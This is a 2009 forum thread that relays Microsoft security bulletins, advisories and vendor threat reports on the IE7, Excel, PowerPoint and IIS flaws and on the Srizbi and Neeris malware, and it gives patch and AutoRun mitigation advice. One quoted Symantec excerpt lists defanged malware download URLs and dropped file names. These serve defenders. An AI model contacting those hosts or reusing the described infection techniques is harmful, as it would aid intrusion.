February 10, 2009 Microsoft Malware Protection Center - "This month's MSRT takes on one of the largest botnets currently active worldwide – Win32/Srizbi. The Srizbi family of malware consists of trojan droppers and rootkits that often spread through spam e-mails containing download links to the malware. Much like its alleged close cousin Win32/Rustock (which is removed by the MSRT since Oct 2008), the Srizbi family of malware was developed mainly for the purpose of spam-for-hire operations. The Srizbi malware authors offer the botnet as an efficient method of sending spam e-mails for any organization who would stoop low enough to utilize this mechanism for advertising their intent..."
> http://www.microsoft.com/security/malwareremove/default.mspx

:fear: :bigthumb:

AplusWebMaster
2009-02-17, 19:34
FYI...

- http://blog.trendmicro.com/another-exploit-targets-ie7-bug/
Feb. 17, 2009 - "Cybercriminals are actively exploiting a critical vulnerability in Internet Explorer 7, which arises from the browser’s improper handling of errors when attempting to access deleted objects. This vulnerability allows remote attackers to execute arbitrary codes on a vulnerable machine. The threat starts with a spammed malicious .DOC file detected as XML_DLOADR.A. This file has a very limited distribution script, suggesting it may be a targeted attack. It contains an ActiveX object that automatically accesses a site rigged with a malicious HTML detected by the Trend Micro Smart Protection Network as HTML_DLOADER.AS. HTML_DLOADER.AS exploits the CVE-2009-0075* vulnerability, which is already addressed by the MS09-002** security patch released last week. On an unpatched system though, successful exploitation by HTML_DLOADER.AS downloads a backdoor detected as BKDR_AGENT.XZMS. This backdoor further installs a .DLL file that has information stealing capabilities. It sends its stolen information to another URL via port 443... Our engineers are still working on the details of this threat. We will post updates as soon as more information becomes available..."
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0075
Last revised: 02/17/2009

** http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx

- http://isc.sans.org/diary.html?storyid=5884
Last Updated: 2009-02-17 19:55:10 UTC - "...there is absolutely nothing preventing attackers from using the exploit in a drive-by attack (and we can, unfortunately, expect that this will happen very soon)..."

- http://www.us-cert.gov/current/#malware_exploiting_microsoft_internet_explorer
February 17, 2009

:fear: :spider: :fear:

AplusWebMaster
2009-02-19, 22:51
FYI...

- http://vrt-sourcefire.blogspot.com/2009/02/ms09-002-in-wild.html
February 18, 2009 - "Yesterday we came across a website taking advantage of a programming error in Internet Explorer that allows a remote attacker to execute code on a vulnerable system. Microsoft issued an advisory (MS09-002) on February 10, 2009 and released a patched on the same day to mitigate the problem. We released same-day coverage for this and other vulnerabilities*... Upon visiting the compromised page with Internet Explorer 7 on a vulnerable machine, a malicious script is executed, which in turn downloads an executable on the system before crashing the web browser...
UPDATE: As of 11AM EST on Feb 19, 2009, another Chinese website is leveraging MS09-002 to push malware to victims..."
* http://www.snort.org/vrt/advisories/vrt-rules-2009-02-10.html
'Better known as "Drive-by malware"...
________________________________________

Cumulative Security Update for Internet Explorer - Extreme Severity
- http://atlas.arbor.net/briefs/
February 23, 2009 - "...key issues to address for -all- users of IE7. We have seen this used in targeted attacks and now exploit kits that target indiscriminately."
* http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx

:fear::mad:

AplusWebMaster
2009-02-25, 00:56
FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
February 24, 2009 - "Microsoft is investigating new public reports of a vulnerability in Microsoft Office Excel that could allow remote code execution if a user opens a specially crafted Excel file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability...
• Users who have installed and are using the Office Document Open Confirmation Tool* for Office 2000 will be prompted with Open, Save, or Cancel before opening a document.
* http://www.microsoft.com/downloads/details.aspx?familyid=8B5762D2-077F-4031-9EE6-C9538E9F2A2F

- http://www.securityfocus.com/bid/33870/exploit
"Symantec has detected active in-the-wild exploit attempts. This issue is detected as 'Trojan.Mdropper.AC'**

Trojan.Mdropper.AC
** http://preview.tinyurl.com/dbz42c
Updated: February 24, 2009 - "Systems Affected: Windows Vista, Windows XP
When the Trojan executes, it may exploit the Microsoft Excel Unspecified Remote Code Execution Vulnerability (BID 33870).
It then drops the following file: %Temp%\rundll.exe (a copy of Downloader)
The Trojan may then attempt to download more files on to the compromised computer from the following locations:
* [http://]61. 59.24.55 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 59.24.45 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 221.40.63 /sb.php?id=[19 RANDOM ASCII CHARACTERS] ..."

:fear::fear:

AplusWebMaster
2009-02-25, 18:18
FYI...

MS AutoRun fix for XP, W2K, W2K3 released...
- http://preview.tinyurl.com/cqtxcd
February 24, 2009 Computerworld - "Microsoft is pushing out a software update to some Windows users that fixes a bug in the Windows AutoRun software, used to automatically launch programs when DVDs or USB devices are introduced to the PC... the widespread Conficker worm uses AutoRun to spread from USB devices to PCs... (MS) had also pushed out a July update that fixed the problem for Vista and Server 2008*; but this fix** was -not- automatically updated for Windows 2000, XP and Server 2003 users..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx

How to correct "disable Autorun registry key" enforcement in Windows
** http://support.microsoft.com/kb/967715
February 24, 2009

- http://isc.sans.org/diary.html?storyid=5938
Last Updated: 2009-02-26 20:46:47 UTC ...(Version: 2)
"...XP home can't run gpedit.msc. XP home users need to follow the "How to selectively disable specific autorun features" steps. I recommend you modify the NoDriveTypeAutoRun value to 0xFF. That should disable autorun on ALL drives."

:fear::fear:

AplusWebMaster
2009-02-27, 20:39
FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
02/24/2009 - "Microsoft is announcing the availability of an update that corrects a functionality feature that can help customers in keeping their systems protected. The update corrects an issue that prevents the NoDriveTypeAutoRun registry key from functioning as expected. When functioning as expected, the NoDriveTypeAutoRun registry key can be used to selectively disable Autorun functionality (e.g. AutoPlay, double click, and contextual menu features associated with Autorun) for drives on a user's system and network. Disabling Autorun functionality can help protect customers from attack vectors that involve the execution of arbitrary code by Autorun when inserting a CD-ROM device, USB device, network shares, or other media containing a file system with an Autorun.inf file. We encourage Windows customers to review and install this update. This update is available through automatic updating and from the download center. For more information about this issue, including download links for this non-security update, see Microsoft Knowledge Base Article 967715*."
* http://support.microsoft.com/kb/967715

:fear::fear:

AplusWebMaster
2009-03-06, 09:46
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-mar.mspx
March 5, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on March 10, 2009...
(Total of -3-)

Critical (1)

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Important (2)

Windows 2
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 3
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Other Information
Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center...

- http://blogs.technet.com/msrc/archive/2009/03/05/march-2009-advanced-notification.aspx
___

- http://www.informationweek.com/shared/printableArticle.jhtm?articleID=215800831
March 5, 2009 - "The vulnerability that Microsoft warned about just over a week ago affects files that use the old .xls binary format but not the newer .xlsx format... Conspicuously absent is a fix for the Excel security flaw..."
// Excel 0-day - http://www.microsoft.com/technet/security/advisory/968272.mspx

- http://atlas.arbor.net/briefs/index#-1301369182
Severity: High Severity
Published: Thursday, March 05, 2009 14:00
At least one, possibly two, new and previously undisclosed vulnerabilities have been discovered and are being actively exploited in targeted, selective attacks. The document drops an EXE that downloads more components from three websites: 61.59.24.55, 61.59.24.45, and 61.221.40.63. At least two of these websites appear to be disabled at this point. We do not know when this vulnerability will be fixed by Microsoft.
Analysis: This is a targeted, very selective attack at this point focusing on US government and specific agencies and third-parties at this point. We do not have any additional information to share at this time, we recommend concerned parties contact Microsoft, CERT/CC or US-CERT for additional details as needed.
- http://www.securityfocus.com/brief/914

SecureWorks
- http://preview.tinyurl.com/99wgn9

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0238

:fear:

AplusWebMaster
2009-03-10, 19:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-mar.mspx
March 10, 2009 - "This bulletin summary lists security bulletins released for March 2009...

Critical -1-

Microsoft Security Bulletin MS09-006 – Critical
Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
- http://www.microsoft.com/technet/security/bulletin/MS09-006.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves several privately reported vulnerabilities in the Windows kernel. The most serious vulnerability could allow remote code execution if a user viewed a specially crafted EMF or WMF image file from an affected system. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0081, CVE-2009-0082, CVE-2009-0083

Important -2-

Microsoft Security Bulletin MS09-007 - Important
Vulnerability in SChannel Could Allow Spoofing (960225)
- http://www.microsoft.com/technet/security/bulletin/MS09-007.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves a privately reported vulnerability in the Secure Channel (SChannel) security package in Windows. The vulnerability could allow spoofing if an attacker gains access to the certificate used by the end user for authentication. Customers are only affected when the public key component of the certificate used for authentication has been obtained by the attacker through other means. This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0085

Microsoft Security Bulletin MS09-008 – Important
Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
- http://www.microsoft.com/technet/security/bulletin/MS09-008.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves two privately reported vulnerabilities and two publicly disclosed vulnerabilities in Windows DNS server and Windows WINS server. These vulnerabilities could allow a remote attacker to redirect network traffic intended for systems on the Internet to the attacker’s own systems. This security update is rated Important for all supported editions of Microsoft Windows 2000 Server, Windows Server 2003, and Windows Server 2008...
CVE-2009-0093, CVE-2009-0094, CVE-2009-0233, CVE-2009-0234
___

Malicious Software Removal Tool
- http://www.microsoft.com/security/malwareremove/default.mspx
File Name: windows-kb890830-v2.8.exe
Version: 2.8
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 3/10/2009
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5995
Last Updated: 2009-03-10 17:48:31 UTC

AplusWebMaster
2009-03-11, 10:08
Revised...

Microsoft Security Bulletin MS08-052 – Critical
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx
Updated: March 10, 2009
• V4.0 (March 10, 2009): Added entry in the Frequently Asked Questions (FAQ) Related to this Security Update section to communicate the rerelease of the update packages for Windows XP Service Pack 3 and Windows Server 2003 Service Pack 2 to fix an installation issue. Customers who have already successfully installed the original updates for Windows XP Service Pack 3 or Windows Server 2003 Service Pack 2 do not need to reinstall the new updates.

:fear:

AplusWebMaster
2009-03-13, 12:31
FYI...

- http://isc.sans.org/diary.html?storyid=6010
Last Updated: 2009-03-13 03:07:43 UTC - "...Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx *), I don’t think enough people know about this..."
* Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code.

:fear::fear:

AplusWebMaster
2009-04-03, 13:20
FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
April 2, 2009 - "Microsoft is investigating new reports of a vulnerability in Microsoft Office PowerPoint that could allow remote code execution if a user opens a specially crafted PowerPoint file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability... Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs..."

- http://secunia.com/advisories/34572/
Release Date: 2009-04-03
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched ...

- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556

:fear:

AplusWebMaster
2009-04-06, 13:20
FYI...

New exploit of MS08-067
- http://blogs.technet.com/mmpc/archive/2009/04/03/a-new-exploit-of-ms08-067-has-been-identified.aspx
April 03, 2009 - "... We have found a new exploit of MS08-067 other than Conficker. We also discovered that we already detected and protected users against this new malware... Neeris is a worm that has been active for a few years. Some of its variants used to exploit MS06-040 which addressed a vulnerability in the same Server service as MS08-067. However it looks like the authors of Neeris have been taking notes from Conficker. A new variant of the Neeris worm has been launched this week. It has some interesting similarities to Conficker:
• The new variant of Neeris has been updated to exploit MS08-067. Also, after the successful exploitation, the victim machine downloads a copy of the worm from the attacking machine using HTTP.
• Neeris spreads via autorun. The new Neeris variant even adds the same ‘Open folder to view files’ AutoPlay option that Conficker does.
• Neeris uses a driver to patch the TCP/IP layer of the system in order to remove the outgoing connection limits from XPSP2 ...
The file names that this malware uses are deceptive. Most commonly we saw it using the name “Netmon.exe” but it sometimes masquerades itself as a SCR file with names that follow the pattern <two digits.scr>. It also drops a copy of itself using the file name smartkey.exe. Even its image time stamp is bogus: 6/19/1992 10:22:17 PM. The malware adds itself to start every time Windows starts and even adds itself to the Safe Boot configuration.
Due to the similarities to Conficker, most of the mitigations that were mentioned also apply here: make sure to install MS08-067 if you haven’t done so yet and be careful to use only AutoPlay options you’re familiar with or consider disabling the Autorun altogether. Other mitigations and information are available in our write up at Worm:Win32/Neeris.gen!C *..."
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fNeeris.gen!C

:fear::fear:

AplusWebMaster
2009-04-10, 14:49
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-apr.mspx?pf=true
April 9, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on April 14, 2009... (Total of -8-)

Critical (5)

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Microsoft Office...

Windows 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

IE
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Excel
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important (2)

Windows 4
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

ISA
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Forefront Edge Security...

Moderate (1)

Windows 5
Maximum Severity Rating: Moderate
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

//

AplusWebMaster
2009-04-11, 00:39
FYI...

- http://www.wservernews.com/
Apr. 10, 2009 - "Next Tuesday (14-Apr-2009), Redmond will no longer offer mainstream support for a bunch of Service Packs flavors, WinXP (Service Pack 0) and W2K3 SP1 among them. They said they will continue to provide free security fixes for XP until 2014. Windows XP still accounts for about 63 percent of all Internet-connected computers, according to March 2009 statistics from Hitslink, while Windows Vista makes up about 24 percent. Here are the Hitslink market share numbers:
http://marketshare.hitslink.com/operating-system-market-share.aspx?qprid=10
Support for WinXP Service Pack 2 is until July 13, 2010. Existing XP users are encouraged to upgrade to the latest SP3. More about this at the "Windows Service Pack Road Map" at Microsoft:
- http://www.microsoft.com/windows/lifecycle/servicepacks.mspx ...
... list of products and versions where the support will end on April 14, 2009...
- http://preview.tinyurl.com/s870 ..."

:lip:

AplusWebMaster
2009-04-13, 13:27
FYI...

- http://preview.tinyurl.com/cj5b73
April 10, 2009 IEBlog - "... Starting on or about the third week of April, users still running IE6 or IE7 on Windows XP, Windows Vista, Windows Server 2003, or Windows Server 2008 will get will get a notification through Automatic Update about IE8. This rollout will start with a narrow audience and expand over time to the entire user base. On Windows XP and Server 2003, the update will be High-Priority. On Windows Vista and Server 2008 it will be Important. IE8 will not automatically install on machines. Users must opt-in to install IE8. Users will see a Welcome screen that offers choices: Ask later, install now, or don’t install. Users who decline the automatic update can still download it from http://www.microsoft.com/ie8 or from Windows Update as an optional update... If an organization uses Automatic Update to keep Windows up-to-date but wants to manage its own deployment of IE8, a free Blocker Toolkit* is available that will block automatic delivery of IE8. This blocker toolkit was released in January 2009 and has no expiration date..."
* http://preview.tinyurl.com/9yjpqw

:spider::buried:

AplusWebMaster
2009-04-14, 20:27
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-apr.mspx?pf=true
April 14, 2009 - "This bulletin summary lists security bulletins released for April 2009... (Total of -8- )

Critical (5)

Microsoft Security Bulletin MS09-009
Vulnerabilities in Microsoft Office Excel Could Cause Remote Code Execution (968557)
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-010
Vulnerabilities in WordPad and Office Text Converters Could Allow Remote Code Execution (960477)
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Microsoft Office...

Microsoft Security Bulletin MS09-011
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution (961373)
- http://www.microsoft.com/technet/security/bulletin/MS09-011.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-013
Vulnerabilities in Windows HTTP Services Could Allow Remote Code Execution (960803)
- http://www.microsoft.com/technet/security/bulletin/MS09-013.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-014
Cumulative Security Update for Internet Explorer (963027)
- http://www.microsoft.com/technet/security/bulletin/MS09-014.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Important (2)

Microsoft Security Bulletin MS09-012
Vulnerabilities in Windows Could Allow Elevation of Privilege (959454)
- http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-016
Vulnerabilities in Microsoft ISA Server and Forefront Threat Management Gateway (Medium Business Edition) Could Cause Denial of Service (961759)
- http://www.microsoft.com/technet/security/bulletin/MS09-016.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Forefront Edge Security...

Moderate (1)

Microsoft Security Bulletin MS09-015
Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426)
- http://www.microsoft.com/technet/security/bulletin/MS09-015.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

- http://blogs.technet.com/msrc/archive/2009/04/14/april-2009-monthly-bulletin-release.aspx
April 14, 2009
___

MSRT - April 2009
- http://support.microsoft.com/?kbid=890830
April 14, 2009 - Revision: 58.0
(Recent adds)
Win32/Conficker - January 2009 (V 2.6) High
Win32/Srizbi - February 2009 (V 2.7) Moderate
Win32/Koobface - March 2009 (V 2.8) Moderate
Win32/Waledac - April 2009 (V 2.9) Moderate
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis (includes CVE links)
- http://isc.sans.org/diary.html?storyid=6193
Last Updated: 2009-04-15 02:14:16 UTC ...
___

- http://preview.tinyurl.com/cnylhb
April 14, 2009 (Computerworld) - 10 of the 23 vulnerabilities have already been exploited or are public...

.

AplusWebMaster
2009-04-15, 13:43
FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
Published: February 24, 2009 | Updated: April 14, 2009 - "... We have issued MS09-009 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 | Updated: April 14, 2009 - "... We have issued MS09-010 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Published: May 30, 2008 | Updated: April 14, 2009 - "... Customers running Safari on Windows should review this advisory. We have issued Microsoft Security Bulletin MS09-014, Cumulative Security Update for Internet Explorer (963027), and MS09-015, Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426), to address this issue. For more information about this issue, including download links for security updates, please review MS09-014 and MS09-015.
- http://www.microsoft.com/technet/security/Bulletin/ms09-014.mspx
- http://www.microsoft.com/technet/security/Bulletin/ms09-015.mspx
Apple Support has released a security advisory that addresses the vulnerability in Apple’s Safari 3.1.2 for Windows. Please see Apple security advisory About the security content of Safari 3.1.2 for Windows for more information.
- http://support.apple.com/kb/HT2092
Mitigating Factors:
• Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat..."

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: April 14, 2009 - "... We have issued MS09-012 to address this issue..."
- http://www.microsoft.com/technet/security/Bulletin/ms09-012.mspx

:fear:

AplusWebMaster
2009-04-29, 15:05
FYI...

IEv8 now pushed...
- http://isc.sans.org/diary.html?storyid=6283
Last Updated: 2009-04-28 23:55:01 UTC - "If you were to go to your "Windows Update..." feature today, you will see that IE8 is now available as a "critical" update to your Microsoft OS..."

Internet Explorer 8 for Windows XP
Date last published: 4/28/2009
Download size: 16.1 MB

:lip:

AplusWebMaster
2009-04-29, 22:34
FYI...

MS Office 2007 SP2 released
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=217200466
April 28, 2009 - "The productivity suite update adds built-in support for Open Document Format and a slew of other tweaks, including improved Outlook performance... The new service pack became available as a manual download* Tuesday. It won't become an automatic update for another 90 days, and then only with a 30-day notice."
* http://preview.tinyurl.com/cfq34v
Knowledge Base (KB) Articles: http://support.microsoft.com/kb/953195
Date Published: 4/24/2009
290.2 MB

>> Note: Several reports found both the IEv8 and MS Office 2007 SP2 updates available on the MS Update site.

- http://jkontherun.com/2009/04/30/office-2007-sp2-breaking-corporate-email/
April 30, 2009 - "... a number of corporate users are experiencing a major bug in SP2 that affects the ability to access the Global Address Book, effectively rendering corporate email useless. One corporate user says the problem went away when Office 2007 SP2 was removed..."

:lip:

AplusWebMaster
2009-04-30, 17:43
FYI...

MS Security Bulletin revisions to:

• MS09-012 - Important
- http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx
• -V2.0- (April 29, 2009): Added an entry to the section, Frequently Asked Questions (FAQ) Related to This Security Update to communicate the rerelease of the Norwegian-language update for Microsoft Windows 2000 Service Pack 4 (KB952004). Customers who require the Norwegian-language update need to download and install the rereleased update. No other updates or locales are affected by this rerelease.

• MS08-076 - Important
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
• -V4.0- (April 29, 2009): Added Windows Media Services 2008 (KB952068) on 32-bit and x64-based editions of Windows Server 2008 Service Pack 2 as affected software. Also, added Windows Server 2008 for Itanium-based Systems Service Pack 2 as non-affected software. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB952068 do not need to reinstall.

• MS08-069 - Critical
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
• -V2.0- (April 29, 2009): Added Microsoft XML Core Services 4.0 (KB954430) on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2 as affected software. Also added as non-affected software: Microsoft XML Core Services 3.0 and Microsoft XML Core Services 6.0 on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB954430 do not need to reinstall.

:fear:

AplusWebMaster
2009-05-08, 04:21
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-may.mspx
May 7, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on May 12, 2009..."
(Total of -1-)

Critical (1)

PowerPoint
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

- http://www.us-cert.gov/current/index.html#microsoft_releases_advance_notification_for21
May 7, 2009

.

AplusWebMaster
2009-05-12, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-may.mspx
May 12, 2009 - "This bulletin summary lists security bulletins released for May 2009...
(Total of -1-)

Critical

Microsoft Security Bulletin MS09-017 - Critical
Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (967340)
- http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

- http://secunia.com/advisories/32428/2/
Last Update: 2009-05-13
Critical: Highly critical

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0220
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0221
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0222
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0223
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0224
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0225
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0226
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0227
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1128
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1129
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1130
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1131
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1137
___

MSRT - May 2009
- http://support.microsoft.com/?kbid=890830
May 12, 2009 - Revision: 59.0
(Recent adds)...
Win32/Koobface March 2009 (V 2.8) Moderate
Win32/Waledac April 2009 (V 2.9) Moderate
Win32/Winwebsec May 2009 (V 2.10) Moderate ...
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6376
Last Updated: 2009-05-12 17:47:16 UTC

AplusWebMaster
2009-05-13, 18:50
FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
Updated: May 12, 2009 - "...We have issued MS09-017* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556

// At least one of the vulnerabilities is actively being exploited in the wild.

AplusWebMaster
2009-05-15, 18:43
FYI...

- http://pandalabs.pandasecurity.com/archive/MS08_2D00_066-in-the-wild.aspx
14 May 09 - "... use Windows with a regular user account, in order to avoid most of the malware actions that require admin rights (install rootkits, modify system files, registry or services,…) . However it’s really important to keep our system updated. You should install Windows updates every month because even if your default Windows user hasn’t got admin privileges, you could still have problems if you execute a malware... With this piece of code, if the system hasn’t been updated with the MS08-066* patch, the malware would be able to do whatever it wants..."
* http://www.microsoft.com/technet/security/bulletin/ms08-066.mspx
Vuln in the MS Ancillary Function Driver Could Allow Elevation of Privilege (956803)
... Why was this security bulletin revised on January 13, 2009?
Microsoft revised this security bulletin to announce a detection change for this security update. As a result of the correction, the detection offers the security update to affected systems that previously were not offered this security update....
- http://support.microsoft.com/kb/956803

(More detail available at the PandaLabs URL above.)

:fear::fear:

AplusWebMaster
2009-05-16, 16:46
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
May 16, 2009 - "The ThreatCon is currently at Level 2: Elevated... A newly discovered and unpatched flaw has been disclosed affecting Microsoft IIS 6 with WebDAV enabled. Due to an error in the way unicode characters are handled, it is possible for an attacker to bypass authentication requirements when accessing a protected resource. It may also be possible for attackers to upload files to a vulnerable server without supplying credentials. Due to the nature of this flaw and the ease at which it can be triggered, we feel that it is probable that attacks will be carried out in the wild. Reports indicate that Microsoft IIS 7 is not vulnerable. More information is available in the following BID: Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities
http://www.securityfocus.com/bid/34993 ..."

- http://isc.sans.org/diary.html?storyid=6397
